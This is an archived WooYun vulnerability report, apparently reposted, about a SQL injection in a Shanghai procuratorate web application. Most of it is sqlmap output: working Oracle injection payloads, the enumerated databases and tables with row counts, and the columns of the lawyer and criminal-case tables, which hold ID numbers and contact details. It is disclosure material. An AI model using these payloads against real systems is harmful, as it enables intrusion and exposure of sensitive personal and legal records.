上海某检察院某处POST注入漏洞可影响11W违法犯罪以及律师详细信息

2017年4月16日20:03:54评论351 views字数 247阅读0分49秒阅读模式

摘要

2016-02-26：细节已通知厂商并且等待厂商处理中
2016-03-01：厂商已经确认，细节仅向厂商公开
2016-03-11：细节向核心白帽子及相关领域专家公开
2016-03-21：细节向普通白帽子公开
2016-03-31：细节向实习白帽子公开
2016-04-15：细节向公众公开

漏洞概要关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-178723

漏洞标题：上海某检察院某处POST注入漏洞可影响11W违法犯罪以及律师详细信息

漏洞作者：路人甲

提交时间： 2016-02-26 11:03

公开时间： 2016-04-15 13:14

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 14

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

如题、、、

详细说明：

http://**.**.**.**:81/wcm/searchapply/searchapply_search_wd_dowith.jsp post 注入漏洞

上海市人民检察院一处SQL注入漏洞，可查看律师：T_LAWYER： 17791 犯人犯罪信息犯罪案例 XWCMCASE ：113918

code 区域

POST /wcm/searchapply/searchapply_search_wd_dowith.jsp HTTP/1.1
 Host: **.**.**.**:81
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: http://**.**.**.**:81/wcm/searchapply/searchapply_search_wd_dowith.jsp
 Cookie: JSESSIONID=E590421FF9781B5A857DF05974734F60; clientlanguage=zh_CN; JWGKCMSSession=0F4BB32C69CEE2B2C7BDBC7333737671; 
 
 _gscu_1687458965=56408206xi61sd14; _gscbrs_1687458965=1; _gscs_1687458965=t56411810d4db8151|pv:1; 
 
 JSESSIONID=89BEBFD1A35D94AF351596499CDA643E
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 34
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: POST
 Parameter: searchPass
     Type: error-based
     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
     Payload: lawyerCardNum=adsa&searchPass=adds' AND 5276=(SELECT UPPER(XMLType(
 CHR(60)||CHR(58)||CHR(111)||CHR(115)||CHR(120)||CHR(58)||(SELECT (CASE WHEN (527
 6=5276) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(106)||CHR(106)||CHR(98)||CHR
 (58)||CHR(62))) FROM DUAL) AND 'rVlH'='rVlH
 
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind
     Payload: lawyerCardNum=adsa&searchPass=adds' AND 4311=DBMS_PIPE.RECEIVE_MESS
 AGE(CHR(107)||CHR(84)||CHR(113)||CHR(111),5) AND 'kxQe'='kxQe
 
 Place: POST
 Parameter: lawyerCardNum
     Type: error-based
     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
     Payload: lawyerCardNum=adsa' AND 5149=(SELECT UPPER(XMLType(CHR(60)||CHR(58)
 ||CHR(111)||CHR(115)||CHR(120)||CHR(58)||(SELECT (CASE WHEN (5149=5149) THEN 1 E
 LSE 0 END) FROM DUAL)||CHR(58)||CHR(106)||CHR(106)||CHR(98)||CHR(58)||CHR(62)))
 FROM DUAL) AND 'FtNJ'='FtNJ&searchPass=adds
 
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind
     Payload: lawyerCardNum=adsa' AND 8812=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CH
 R(88)||CHR(102)||CHR(101),5) AND 'iwaJ'='iwaJ&searchPass=adds
 ---
 back-end DBMS: Oracle
 
 available databases [31]:
 [*] CTXSYS
 [*] HR
 [*] MDSYS
 [*] ODM
 [*] ODM_MTR
 [*] OE
 [*] OLAPSYS
 [*] ORDSYS
 [*] OUTLN
 [*] PM
 [*] QS
 [*] QS_CBADM
 [*] QS_CS
 [*] QS_ES
 [*] QS_OS
 [*] QS_WS
 [*] RMAN
 [*] SCOTT
 [*] SH
 [*] SHJCYWCM
 [*] SYS
 [*] SYSTEM
 [*] TRSMAS
 [*] TRSTEST
 [*] TRSWCM
 [*] TRSWCMDB
 [*] TRSWCMV7
 [*] WCMPLUS
 [*] WKSYS
 [*] WMSYS
 [*] XDB
 
 current user:    'SHJCYWCM'
 
 current schema (equivalent to database on Oracle):    'SHJCYWCM'

漏洞证明：

code 区域

Database: SHJCYWCM
 [217 tables]
 +-------------------------------+
 | CMS_ARTICLE                   |
 | CMS_ARTICLE_DATA              |
 | CMS_CATEGORY                  |
 | CMS_COMMENT                   |
 | CMS_GUESTBOOK                 |
 | CMS_LINK                      |
 | CMS_SITE                      |
 | SYS_AREA                      |
 | SYS_DICT                      |
 | SYS_LOG                       |
 | SYS_MDICT                     |
 | SYS_MENU                      |
 | SYS_OFFICE                    |
 | SYS_ROLE                      |
 | SYS_ROLE_MENU                 |
 | SYS_ROLE_OFFICE               |
 | SYS_USER                      |
 | SYS_USER_ROLE                 |
 | TABS                          |
 | T_LAWFORM                     |
 | T_LAWYER                      |
 | WCMADDRESS                    |
 | WCMADDRGROUP                  |
 | WCMADDRGRPMAP                 |
 | WCMAPPENDIX                   |
 | WCMAUTOBAKCONFIG              |
 | WCMBOOKMARK                   |
 | WCMBULLETIN                   |
 | WCMCHANNEL                    |
 | WCMCHANNELCHILDINDEXQUOTE     |
 | WCMCHANNELCONTENTLINK         |
 | WCMCHANNELSYN                 |
 | WCMCHNLDOC                    |
 | WCMCHNLEXTFIELD               |
 | WCMCHNLFLOW                   |
 | WCMCHNLTEMP                   |
 | WCMCLUSTERLOCK                |
 | WCMCONDITIONBEAN              |
 | WCMCONFIG                     |
 | WCMCONTACT                    |
 | WCMCONTENTEXTFIELD            |
 | WCMCONTENTLINK                |
 | WCMCONTENTLINKTYPE            |
 | WCMCONTGROUP                  |
 | WCMCONTGRPMAP                 |
 | WCMDBUPDATE                   |
 | WCMDBUPDATELOG                |
 | WCMDOCBAK                     |
 | WCMDOCKEYWORD                 |
 | WCMDOCKIND                    |
 | WCMDOCQUOTEIMAGE              |
 | WCMDOCREPLY                   |
 | WCMDOCSOURCE_STAT_NEW         |
 | WCMDOCSYN                     |
 | WCMDOCTYPE                    |
 | WCMDOCUMENT                   |
 | WCMENUMVALUE                  |
 | WCMEVENT                      |
 | WCMEVENTSHARE                 |
 | WCMEVENTTYPE                  |
 | WCMEXPIRATION                 |
 | WCMEXTFIELD                   |
 | WCMFILETYPE                   |
 | WCMFLOW                       |
 | WCMFLOWACTION                 |
 | WCMFLOWBRANCH                 |
 | WCMFLOWCONTENTCONFIG          |
 | WCMFLOWDOC                    |
 | WCMFLOWDOCBAK                 |
 | WCMFLOWEMPLOY                 |
 | WCMFLOWEVENTCONDITION         |
 | WCMFLOWEVENTOPERATE           |
 | WCMFLOWMONOPER                |
 | WCMFLOWNODE                   |
 | WCMFLOWNODEEVENT              |
 | WCMFLOWNODEOPER               |
 | WCMFOLDERPUBLISHCONFIG        |
 | WCMFOLDERPUBLISHINFO          |
 | WCMFORMFIELDS                 |
 | WCMFORMINFO                   |
 | WCMGROUP                      |
 | WCMGRPROLE                    |
 | WCMGRPUSER                    |
 | WCMHELP                       |
 | WCMHITSCOUNT                  |
 | WCMID                         |
 | WCMINFOVIEW                   |
 | WCMINFOVIEWEMPLOY             |
 | WCMINFOVIEWFIELD              |
 | WCMINFOVIEWGROUP              |
 | WCMINFOVIEWSERIAL             |
 | WCMINFOVIEWVIEW               |
 | WCMJOB                        |
 | WCMJOBEXERESULT               |
 | WCMLOG                        |
 | WCMLOGBAK                     |
 | WCMLOGTYPE                    |
 | WCMMARKKIND                   |
 | WCMMARKSHARE                  |
 | WCMMEETINGCONT                |
 | WCMMEETINGROOM                |
 | WCMMEETINGUSER                |
 | WCMMESSAGE                    |
 | WCMMSGQUEUE                   |
 | WCMMSGRECEIVER                |
 | WCMOBJTRIGGER                 |
 | WCMOPER                       |
 | WCMOPERATIONBEAN              |
 | WCMOPERTYPE                   |
 | WCMPUBLISHCONFIG              |
 | WCMPUBLISHDISTRIBUTION        |
 | WCMPUBLISHERRORLOG            |
 | WCMPUBLISHTASK                |
 | WCMPUBSTATUSCONFIG            |
 | WCMRECENT                     |
 | WCMRELATION                   |
 | WCMREPLACE                    |
 | WCMRIGHT                      |
 | WCMRIGHTDEF                   |
 | WCMROLE                       |
 | WCMROLEUSER                   |
 | WCMSCHEDULE                   |
 | WCMSECUREKEY                  |
 | WCMSECURITY                   |
 | WCMSITEEXTFIELD               |
 | WCMSITEUSER                   |
 | WCMSOURCE                     |
 | WCMSTATFIELDMAP               |
 | WCMSTATHOST                   |
 | WCMSTATUS                     |
 | WCMSTATVIEW                   |
 | WCMSTATVIEWREL                |
 | WCMSTAT_CHANNEL_GENERAL       |
 | WCMSTAT_CHANNEL_TEMPLATE      |
 | WCMSTAT_DOCSOURCE_PUBALL      |
 | WCMSTAT_GROUP_GENERAL         |
 | WCMSTAT_SITE_GENERAL          |
 | WCMSTAT_USER_GENERAL          |
 | WCMSTAT_WFAPPLY_GROUP_GENERAL |
 | WCMSTAT_WFAPPLY_USER_GENERAL  |
 | WCMSTAT_WORKFLOW_GROUP        |
 | WCMSTAT_WORKFLOW_USER         |
 | WCMTAGBEANS                   |
 | WCMTASK                       |
 | WCMTASKPOOL                   |
 | WCMTEMPAPDREL                 |
 | WCMTEMPAPPENDIX               |
 | WCMTEMPLATE                   |
 | WCMTEMPLATEARGUMENT           |
 | WCMTEMPLATEEMPLOY             |
 | WCMTEMPLATENEST               |
 | WCMTEMPLATEQUOTE              |
 | WCMTRUSTEEINFO                |
 | WCMUSER                       |
 | WCMUSERSETTING                |
 | WCMWEBSITE                    |
 | XWCMAPPLYFORM                 |
 | XWCMAPPLYFORMDEALLOG          |
 | XWCMAPPOPERATELOGS            |
 | XWCMBLACKLIST                 |
 | XWCMCASE                      |
 | XWCMCASEBAK                   |
 | XWCMCASELOG                   |
 | XWCMCELLINFO                  |
 | XWCMCLASSINFO                 |
 | XWCMCLASSINFOVIEW             |
 | XWCMCOMPLEXFIELDDATA          |
 | XWCMCONTENTSTYLE              |
 | XWCMCUSTOMSITECHECKEDINFO     |
 | XWCMDBFIELDINFO               |
 | XWCMDOCUMENTTOPIC             |
 | XWCMENTRYCONFIG               |
 | XWCMEXPORTLOG                 |
 | XWCMFCKVIDEO                  |
 | XWCMFLOWACTION                |
 | XWCMFLOWCONDITION             |
 | XWCMFLOWDOCLOG                |
 | XWCMFLOWNODEFIELD             |
 | XWCMFLOWRULE                  |
 | XWCMHOLIDAY                   |
 | XWCMHTTPLOG                   |
 | XWCMINDIVIDUATION             |
 | XWCMKEYWORD                   |
 | XWCMLAWAPPENDIX               |
 | XWCMLAWUSER                   |
 | XWCMLAWYER                    |
 | XWCMLAWYERAPPLY               |
 | XWCMLAWYERAPPLYBAK            |
 | XWCMLEAMASSGE                 |
 | XWCMLOGO                      |
 | XWCMMAILCONFIG                |
 | XWCMMAILSMSOPERATELOGS        |
 | XWCMMAILSMSTEMPLATE           |
 | XWCMMASTER                    |
 | XWCMMESSAGELOGS               |
 | XWCMMETADATA                  |
 | XWCMMETAVIEWEMPLOYER          |
 | XWCMOBJECTMEMBER              |
 | XWCMPAGEOPERATOR              |
 | XWCMPAGESTYLE                 |
 | XWCMREGIONEMPLOY              |
 | XWCMREGIONINFO                |
 | XWCMRESOURCEBLOCK             |
 | XWCMRESOURCESTYLE             |
 | XWCMSEARCHAPPLY               |
 | XWCMSTYLEITEM                 |
 | XWCMTABLEINFO                 |
 | XWCMTOPICEDDOCRELATION        |
 | XWCMVIDEO_SP2                 |
 | XWCMVIEWFIELDINFO             |
 | XWCMVIEWINFO                  |
 | XWCMVIEWOTHERTABLES           |
 | XWCMWATERMARK                 |
 | XWCMWIDGET                    |
 | XWCMWIDGETINSTANCE            |
 | XWCMWIDGETINSTPARAMETER       |
 | XWCMWIDGETPARAMETER           |
 +-------------------------------+
 
 
 Database: SHJCYWCM
 +--------------------------+---------+
 | Table                    | Entries |
 +--------------------------+---------+
 | XWCMHTTPLOG              | 9471867 |
 | WCMLOG                   | 202760  |
 | XWCMMESSAGELOGS          | 134021  |
 | XWCMCASE                 | 113918  |
 | XWCMAPPOPERATELOGS       | 81920   |
 | XWCMCASEBAK              | 56518   |
 | XWCMLAWAPPENDIX          | 25227   |
 | WCMCHNLDOC               | 22218   |
 | WCMDOCUMENT              | 22070   |
 | XWCMSEARCHAPPLY          | 21902   |
 | XWCMLAWYERAPPLY          | 21659   |
 | XWCMMAILSMSOPERATELOGS   | 18075   |
 | T_LAWYER                 | 17791   |
 | XWCMLAWYER               | 17791   |
 | WCMSTAT_CHANNEL_GENERAL  | 7865    |
 | WCMSTAT_USER_GENERAL     | 7621    |
 | WCMAPPENDIX              | 4560    |
 | WCMSTAT_SITE_GENERAL     | 1940    |
 | WCMSTAT_GROUP_GENERAL    | 1769    |
 | XWCMCASELOG              | 1421    |
 | T_LAWFORM                | 1407    |
 | WCMSTAT_DOCSOURCE_PUBALL | 1221    |
 | XWCMOBJECTMEMBER         | 1013    |
 | WCMRIGHT                 | 971     |
 | WCMTEMPAPDREL            | 575     |
 | WCMTEMPLATEEMPLOY        | 486     |
 | WCMTEMPAPPENDIX          | 409     |
 | WCMMESSAGE               | 373     |
 | WCMMSGRECEIVER           | 373     |
 | XWCMEXPORTLOG            | 308     |
 | WCMFOLDERPUBLISHCONFIG   | 271     |
 | WCMCHANNEL               | 266     |
 | WCMTEMPLATEQUOTE         | 193     |
 | WCMUSER                  | 187     |
 | WCMHELP                  | 172     |
 | SYS_LOG                  | 140     |
 | WCMSTATFIELDMAP          | 140     |
 | WCMCONFIG                | 128     |
 | WCMUSERSETTING           | 124     |
 | WCMOPERTYPE              | 116     |
 | WCMGRPUSER               | 115     |
 | WCMGRPROLE               | 105     |
 | WCMID                    | 104     |
 | WCMRIGHTDEF              | 92      |
 | WCMTAGBEANS              | 92      |
 | XWCMLEAMASSGE            | 92      |
 | XWCMHOLIDAY              | 86      |
 | SYS_MENU                 | 79      |
 | WCMROLEUSER              | 73      |
 | SYS_ROLE_MENU            | 66      |
 | WCMDOCSOURCE_STAT_NEW    | 66      |
 | WCMTEMPLATE              | 66      |
 | SYS_DICT                 | 63      |
 | WCMSITEUSER              | 53      |
 | WCMSTATVIEW              | 45      |
 | WCMTEMPLATENEST          | 41      |
 | WCMSTATVIEWREL           | 33      |
 | SYS_OFFICE               | 26      |
 | WCMGROUP                 | 25      |
 | XWCMINDIVIDUATION        | 24      |
 | SYS_ROLE_OFFICE          | 22      |
 | WCMDOCKEYWORD            | 20      |
 | WCMROLE                  | 20      |
 | WCMREPLACE               | 19      |
 | WCMOPER                  | 15      |
 | SYS_AREA                 | 14      |
 | WCMSCHEDULE              | 11      |
 | WCMDBUPDATE              | 10      |
 | WCMEVENTTYPE             | 10      |
 | WCMSTATHOST              | 9       |
 | WCMSTATUS                | 9       |
 | WCMJOBEXERESULT          | 8       |
 | WCMMSGQUEUE              | 8       |
 | WCMPUBSTATUSCONFIG       | 8       |
 | WCMRELATION              | 8       |
 | WCMSOURCE                | 8       |
 | WCMWEBSITE               | 8       |
 | WCMLOGTYPE               | 7       |
 | XWCMENTRYCONFIG          | 7       |
 | WCMCONDITIONBEAN         | 6       |
 | XWCMMAILSMSTEMPLATE      | 6       |
 | WCMOPERATIONBEAN         | 5       |
 | WCMENUMVALUE             | 4       |
 | WCMFLOWNODE              | 4       |
 | WCMPUBLISHDISTRIBUTION   | 4       |
 | XWCMFLOWDOCLOG           | 4       |
 | WCMFLOWBRANCH            | 3       |
 | WCMSECURITY              | 3       |
 | SYS_USER                 | 2       |
 | SYS_USER_ROLE            | 2       |
 | WCMEXTFIELD              | 2       |
 | WCMFLOWDOC               | 2       |
 | WCMFLOWNODEOPER          | 2       |
 | XWCMBLACKLIST            | 2       |
 | XWCMFLOWACTION           | 2       |
 | XWCMFLOWCONDITION        | 2       |
 | SYS_ROLE                 | 1       |
 | TABS                     | 1       |
 | WCMDOCBAK                | 1       |
 | WCMFLOW                  | 1       |
 | WCMFLOWEMPLOY            | 1       |
 | WCMSTAT_WORKFLOW_GROUP   | 1       |
 | WCMSTAT_WORKFLOW_USER    | 1       |
 | XWCMFLOWRULE             | 1       |
 | XWCMLAWUSER              | 1       |
 | XWCMLOGO                 | 1       |
 +--------------------------+---------+
 
 
 Database: SHJCYWCM
 Table: T_LAWYER
 [21 columns]
 +----------------+----------+
 | Column         | Type     |
 +----------------+----------+
 | ADDRESS        | VARCHAR2 |
 | ASSESSMENT     | VARCHAR2 |
 | EDUCATION      | VARCHAR2 |
 | EMAIL          | VARCHAR2 |
 | FAX            | VARCHAR2 |
 | GENDER         | VARCHAR2 |
 | IDNUMBER       | VARCHAR2 |
 | LAWFIRMID      | VARCHAR2 |
 | LAWYERID       | VARCHAR2 |
 | LICENSENUMBER  | VARCHAR2 |
 | MEMBERNUMBER   | VARCHAR2 |
 | MOBILE         | VARCHAR2 |
 | NAME           | VARCHAR2 |
 | NATION         | VARCHAR2 |
 | PARTNER        | VARCHAR2 |
 | PERSONID       | VARCHAR2 |
 | PHONE          | VARCHAR2 |
 | POLITIC        | VARCHAR2 |
 | PORTRAIT       | VARCHAR2 |
 | PRACTICESTATUS | VARCHAR2 |
 | PRACTICETYPE   | VARCHAR2 |
 +----------------+----------+
 
 Database: SHJCYWCM
 Table: XWCMCASE
 [18 columns]
 +-------------------+----------+
 | Column            | Type     |
 +-------------------+----------+
 | ACCEPTDATE        | VARCHAR2 |
 | APPROVEDATE       | VARCHAR2 |
 | CASEACCEPCTNUM    | VARCHAR2 |
 | CASEACCEPCTNUM1   | VARCHAR2 |
 | CASEACCEPCTNUM2   | VARCHAR2 |
 | CASEBRIEF         | VARCHAR2 |
 | CASEID            | VARCHAR2 |
 | CASENAME          | VARCHAR2 |
 | CASESTAGE         | VARCHAR2 |
 | CRTIME            | DATE     |
 | GROUPID           | NUMBER   |
 | GROUPNAME         | VARCHAR2 |
 | ID                | NUMBER   |
 | PERSONID          | VARCHAR2 |
 | PERSONNAME        | VARCHAR2 |
 | RELATIONCASEIDS   | VARCHAR2 |
 | RELATIONIDS       | CLOB     |
 | RELATIONPERSONIDS | VARCHAR2 |
 +-------------------+----------+

修复方案：

修复吧、、、

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-03-01 13:14

厂商回复：

CNVD确认所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置.

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-02-26 11:44 | 骑虎打狗 ( 路人 | Rank:19 漏洞数:9 | 我是中国式的你懂得..)

1

果然你抹去了你奸淫的罪名？

1# 回复此人
2016-02-26 11:52 | 蝶离飞 ( 实习白帽子 | Rank:42 漏洞数:15 | 苦B骚年)

1

果然你抹去了你掳掠的罪名？

2# 回复此人
2016-02-26 12:02 | 库日天 ( 路人 | Rank:18 漏洞数:9 )

1

果然你抹去了你掳掠的罪名？

3# 回复此人
2016-02-26 12:46 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问，还有谁！！！！！！！！！！！！！...)

1

果然你抹去了你奸淫的罪名？

4# 回复此人
2016-02-26 13:18 | 田老板 ( 路人 | Rank:30 漏洞数:13 | 学校杀手)

1

唉不想说了

5# 回复此人
2016-03-01 14:46 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)

1

果然你抹去了你奸淫的罪名？

6# 回复此人

漏洞概要 关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-178723

漏洞标题： 上海某检察院某处POST注入漏洞可影响11W违法犯罪以及律师详细信息

相关厂商： 上海市人民检察院

漏洞作者： 路人甲

提交时间： 2016-02-26 11:03

公开时间： 2016-04-15 13:14

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 14

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(13) 关注此漏洞

漏洞标题：上海某检察院某处POST注入漏洞可影响11W违法犯罪以及律师详细信息

相关厂商：上海市人民检察院

漏洞作者：路人甲

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：注射技巧

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分